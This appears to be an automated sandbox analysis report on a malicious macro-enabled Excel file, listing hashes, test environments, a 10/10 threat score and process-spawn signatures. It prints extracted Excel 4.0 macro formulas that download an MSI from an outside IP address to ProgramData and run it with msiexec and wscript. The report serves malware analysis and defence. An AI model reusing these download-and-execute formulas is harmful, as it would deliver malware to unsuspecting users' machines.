General
Target
0454c6a4b3529de10f718ac63472b620
Size
6KB
Sample
231221-zggelsdbcp
MD5
0454c6a4b3529de10f718ac63472b620
SHA1
930f804cb102043bf923ce34a1aca7565639e4dd
SHA256
c8b5f090fca28bef28a607e307b4a703aaba5cdc3dae9a63752849710c20a75e
SHA512
ed1a40478c6f2a1600adeaf65d39540a21f60979c1ab1cdb57ccbd6b4c2d75a87e7a3cf51522355b86f6210a2efb1bd28f209cd2afd137be6394461f7b1b6a62
SSDEEP
192:NDSpuSl1aEOmmfR28UhHFBFYuQb98y+Mts:NOu8wI1FY9b98y+ms
Static task
static1
Behavioral task
behavioral1
Sample
0454c6a4b3529de10f718ac63472b620.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0454c6a4b3529de10f718ac63472b620.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
formulas
=EXEC("msiexec.exe")
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
=EXEC("wscript C:\ProgramData\start.vbs")
=HALT()
Targets
Target
0454c6a4b3529de10f718ac63472b620
Score
10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.